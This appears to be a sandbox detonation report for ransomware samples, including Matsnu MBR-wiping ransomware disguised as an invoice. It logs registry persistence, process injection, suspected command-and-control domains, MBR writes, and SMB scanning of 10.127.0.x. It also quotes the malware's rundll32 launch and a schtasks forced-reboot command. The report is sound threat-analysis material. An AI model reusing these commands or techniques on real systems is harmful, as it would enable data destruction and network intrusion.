| Set value (str) | \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\blwkxyjx = "C:\\Users\\Admin\\AppData\\Roaming\\Sbyhclwfz\\ykyrpclxyjx.exe" | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2092 set thread context of 1360 | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe |
| PID 2904 set thread context of 2768 | N/A | C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre | C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"
C:\Windows\SysWOW64\svchost.exe
svchost.exe
C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre
C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre
C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre
C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre
C:\Windows\SysWOW64\svchost.exe
svchost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | nvufvwieg.com | udp |
| US | 8.8.8.8:53 | zeouk-gt.com | udp |
| US | 8.8.8.8:53 | mbqdczxrz.com | udp |
| US | 8.8.8.8:53 | seodirect-proxy.com | udp |
| US | 8.8.8.8:53 | pcv-onlines.com | udp |
| US | 8.8.8.8:53 | pgcv-online.com | udp |
| US | 8.8.8.8:53 | porkysolderxx.com | udp |
| US | 8.8.8.8:53 | openwebspace-apo.com | udp |
| US | 8.8.8.8:53 | nvufvwieg.com | udp |
| US | 8.8.8.8:53 | zeouk-gt.com | udp |
Files
memory/1360-2-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1360-8-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1360-12-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1360-11-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1360-10-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1360-6-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1360-13-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1360-4-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1360-0-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2856-15-0x000000007EFA0000-0x000000007EFAE000-memory.dmp
memory/2856-14-0x000000007EFA0000-0x000000007EFAE000-memory.dmp
memory/2856-19-0x000000007EFA0000-0x000000007EFAE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre
| MD5 | 1b2d2a4b97c7c2727d571bbf9376f54f |
| SHA1 | 1fc29938ec5c209ba900247d2919069b320d33b0 |
| SHA256 | 7634433f8fcf4d13fb46d680802e48eeb160e0f51e228cae058436845976381e |
| SHA512 | 506fc96423e5e2e38078806591e09a6eb3cf924eb748af528f7315aa0b929890823798a3ef2a5809c14023c3ff8a3db36277bc90c7b099218422aafa4e0c2ee0 |
memory/2768-41-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2768-45-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2648-47-0x000000007EFA0000-0x000000007EFAE000-memory.dmp
memory/2648-50-0x000000007EFA0000-0x000000007EFAE000-memory.dmp
memory/2648-51-0x000000007EFA0000-0x000000007EFAE000-memory.dmp
memory/2648-57-0x000000007EFA0000-0x000000007EFAE000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win7-20240419-en
Max time kernel
1799s
Max time network
1800s
Command Line
Signatures
Mimikatz
mimikatz is an open source tool to dump credentials on Windows
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1C86.tmp | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DISTLIST.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\SynchronizationEula.rtf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Text.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFNOT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\EXITEM.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AssemblyInfoInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKREQ.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\win32\jawt_md.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESN.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECREC.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLPERF.H | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Class.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dataset.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.PPT | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\NOTE.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfo.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DOC.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDREST.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\jdwpTransport.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\jni.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\firefox.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CONTACT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\INFOMAIL.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OMSMMS.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrome.7z | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\en-US\eula.rtf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDREQ.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Web Server Extensions\14\BIN\1033\FPEXT.MSG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\SAMPLES\SOLVSAMP.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dialog.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OOFTMPL.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POSTIT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REPORT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SIGN.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AboutBox.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\IPM.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESP.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SHARING.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\ClearProtect.docx | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OMSSMS.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RCLRPT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKACC.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECURE.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\MDIParent.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\dllhost.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1C86.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1C86.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1C86.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1C86.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1C86.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1C86.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03
C:\Users\Admin\AppData\Local\Temp\1C86.tmp
"C:\Users\Admin\AppData\Local\Temp\1C86.tmp" \\.\pipe\{F46F4EDF-B424-40C2-B1EB-5B93688047ED}
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03
Network
| Country | Destination | Domain | Proto |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.0.0:139 | tcp | |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.2:139 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.3:139 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.4:139 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.5:139 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.6:139 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.7:139 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.8:139 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.9:139 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.10:139 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.11:139 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.12:139 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.13:139 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.14:139 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.15:139 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.16:139 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.17:139 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.18:139 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.19:139 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.20:139 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.21:139 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.22:139 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.23:139 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.24:139 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.25:139 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.26:139 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.27:139 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.28:139 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.29:139 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.30:139 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.31:139 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.32:139 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.33:139 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.34:139 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.35:139 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.36:139 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.0.37:139 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.0.38:139 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.0.39:139 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.0.40:139 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.0.41:139 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.0.42:139 | tcp | |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.0.43:139 | tcp | |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.0.44:139 | tcp | |
| N/A | 10.127.0.45:445 | tcp | |
| N/A | 10.127.0.45:139 | tcp | |
| N/A | 10.127.0.46:445 | tcp | |
| N/A | 10.127.0.46:139 | tcp | |
| N/A | 10.127.0.47:445 | tcp | |
| N/A | 10.127.0.47:139 | tcp | |
| N/A | 10.127.0.48:445 | tcp | |
| N/A | 10.127.0.48:139 | tcp | |
| N/A | 10.127.0.49:445 | tcp | |
| N/A | 10.127.0.49:139 | tcp | |
| N/A | 10.127.0.50:445 | tcp | |
| N/A | 10.127.0.50:139 | tcp | |
| N/A | 10.127.0.51:445 | tcp | |
| N/A | 10.127.0.51:139 | tcp | |
| N/A | 10.127.0.52:445 | tcp | |
| N/A | 10.127.0.52:139 | tcp | |
| N/A | 10.127.0.53:445 | tcp | |
| N/A | 10.127.0.53:139 | tcp | |
| N/A | 10.127.0.54:445 | tcp | |
| N/A | 10.127.0.54:139 | tcp | |
| N/A | 10.127.0.55:445 | tcp | |
| N/A | 10.127.0.55:139 | tcp | |
| N/A | 10.127.0.56:445 | tcp | |
| N/A | 10.127.0.56:139 | tcp | |
| N/A | 10.127.0.57:445 | tcp | |
| N/A | 10.127.0.57:139 | tcp | |
| N/A | 10.127.0.58:445 | tcp | |
| N/A | 10.127.0.58:139 | tcp | |
| N/A | 10.127.0.59:445 | tcp | |
| N/A | 10.127.0.59:139 | tcp | |
| N/A | 10.127.0.60:445 | tcp | |
| N/A | 10.127.0.60:139 | tcp | |
| N/A | 10.127.0.61:445 | tcp | |
| N/A | 10.127.0.61:139 | tcp | |
| N/A | 10.127.0.62:445 | tcp | |
| N/A | 10.127.0.62:139 | tcp | |
| N/A | 10.127.0.63:445 | tcp | |
| N/A | 10.127.0.63:139 | tcp | |
| N/A | 10.127.0.64:445 | tcp | |
| N/A | 10.127.0.64:139 | tcp | |
| N/A | 10.127.0.65:445 | tcp | |
| N/A | 10.127.0.65:139 | tcp | |
| N/A | 10.127.0.66:445 | tcp | |
| N/A | 10.127.0.66:139 | tcp | |
| N/A | 10.127.0.67:445 | tcp | |
| N/A | 10.127.0.67:139 | tcp | |
| N/A | 10.127.0.68:445 | tcp | |
| N/A | 10.127.0.68:139 | tcp | |
| N/A | 10.127.0.69:445 | tcp | |
| N/A | 10.127.0.69:139 | tcp | |
| N/A | 10.127.0.70:445 | tcp | |
| N/A | 10.127.0.70:139 | tcp | |
| N/A | 10.127.0.71:445 | tcp | |
| N/A | 10.127.0.71:139 | tcp | |
| N/A | 10.127.0.72:445 | tcp | |
| N/A | 10.127.0.72:139 | tcp | |
| N/A | 10.127.0.73:445 | tcp | |
| N/A | 10.127.0.73:139 | tcp | |
| N/A | 10.127.0.74:445 | tcp | |
| N/A | 10.127.0.74:139 | tcp | |
| N/A | 10.127.0.75:445 | tcp | |
| N/A | 10.127.0.75:139 | tcp | |
| N/A | 10.127.0.76:445 | tcp | |
| N/A | 10.127.0.76:139 | tcp | |
| N/A | 10.127.0.77:445 | tcp | |
| N/A | 10.127.0.77:139 | tcp | |
| N/A | 10.127.0.78:445 | tcp | |
| N/A | 10.127.0.78:139 | tcp | |
| N/A | 10.127.0.79:445 | tcp | |
| N/A | 10.127.0.79:139 | tcp | |
| N/A | 10.127.0.80:445 | tcp | |
| N/A | 10.127.0.80:139 | tcp | |
| N/A | 10.127.0.81:445 | tcp | |
| N/A | 10.127.0.81:139 | tcp | |
| N/A | 10.127.0.82:445 | tcp | |
| N/A | 10.127.0.82:139 | tcp | |
| N/A | 10.127.0.83:445 | tcp | |
| N/A | 10.127.0.83:139 | tcp | |
| N/A | 10.127.0.84:445 | tcp | |
| N/A | 10.127.0.84:139 | tcp | |
| N/A | 10.127.0.85:445 | tcp | |
| N/A | 10.127.0.85:139 | tcp | |
| N/A | 10.127.0.86:445 | tcp | |
| N/A | 10.127.0.86:139 | tcp | |
| N/A | 10.127.0.87:445 | tcp | |
| N/A | 10.127.0.87:139 | tcp | |
| N/A | 10.127.0.88:445 | tcp | |
| N/A | 10.127.0.88:139 | tcp | |
| N/A | 10.127.0.89:445 | tcp | |
| N/A | 10.127.0.89:139 | tcp | |
| N/A | 10.127.0.90:445 | tcp | |
| N/A | 10.127.0.90:139 | tcp | |
| N/A | 10.127.0.91:445 | tcp | |
| N/A | 10.127.0.91:139 | tcp | |
| N/A | 10.127.0.92:445 | tcp | |
| N/A | 10.127.0.92:139 | tcp | |
| N/A | 10.127.0.93:445 | tcp | |
| N/A | 10.127.0.93:139 | tcp | |
| N/A | 10.127.0.94:445 | tcp | |
| N/A | 10.127.0.94:139 | tcp | |
| N/A | 10.127.0.95:445 | tcp | |
| N/A | 10.127.0.95:139 | tcp | |
| N/A | 10.127.0.96:445 | tcp | |
| N/A | 10.127.0.96:139 | tcp | |
| N/A | 10.127.0.97:445 | tcp | |
| N/A | 10.127.0.97:139 | tcp | |
| N/A | 10.127.0.98:445 | tcp | |
| N/A | 10.127.0.98:139 | tcp | |
| N/A | 10.127.0.99:445 | tcp | |
| N/A | 10.127.0.99:139 | tcp | |
| N/A | 10.127.0.100:445 | tcp | |
| N/A | 10.127.0.100:139 | tcp | |
| N/A | 10.127.0.101:445 | tcp | |
| N/A | 10.127.0.101:139 | tcp | |
| N/A | 10.127.0.102:445 | tcp | |
| N/A | 10.127.0.102:139 | tcp | |
| N/A | 10.127.0.103:445 | tcp | |
| N/A | 10.127.0.103:139 | tcp | |
| N/A | 10.127.0.104:445 | tcp | |
| N/A | 10.127.0.104:139 | tcp | |
| N/A | 10.127.0.105:445 | tcp | |
| N/A | 10.127.0.105:139 | tcp | |
| N/A | 10.127.0.106:445 | tcp | |
| N/A | 10.127.0.106:139 | tcp | |
| N/A | 10.127.0.107:445 | tcp | |
| N/A | 10.127.0.107:139 | tcp | |
| N/A | 10.127.0.108:445 | tcp | |
| N/A | 10.127.0.108:139 | tcp | |
| N/A | 10.127.0.109:445 | tcp | |
| N/A | 10.127.0.109:139 | tcp | |
| N/A | 10.127.0.110:445 | tcp | |
| N/A | 10.127.0.110:139 | tcp | |
| N/A | 10.127.0.111:445 | tcp | |
| N/A | 10.127.0.111:139 | tcp | |
| N/A | 10.127.0.112:445 | tcp | |
| N/A | 10.127.0.112:139 | tcp | |
| N/A | 10.127.0.113:445 | tcp | |
| N/A | 10.127.0.113:139 | tcp | |
| N/A | 10.127.0.114:445 | tcp | |
| N/A | 10.127.0.114:139 | tcp | |
| N/A | 10.127.0.115:445 | tcp | |
| N/A | 10.127.0.115:139 | tcp | |
| N/A | 10.127.0.116:445 | tcp | |
| N/A | 10.127.0.116:139 | tcp | |
| N/A | 10.127.0.117:445 | tcp | |
| N/A | 10.127.0.117:139 | tcp | |
| N/A | 10.127.0.118:445 | tcp | |
| N/A | 10.127.0.118:139 | tcp | |
| N/A | 10.127.0.119:445 | tcp | |
| N/A | 10.127.0.119:139 | tcp | |
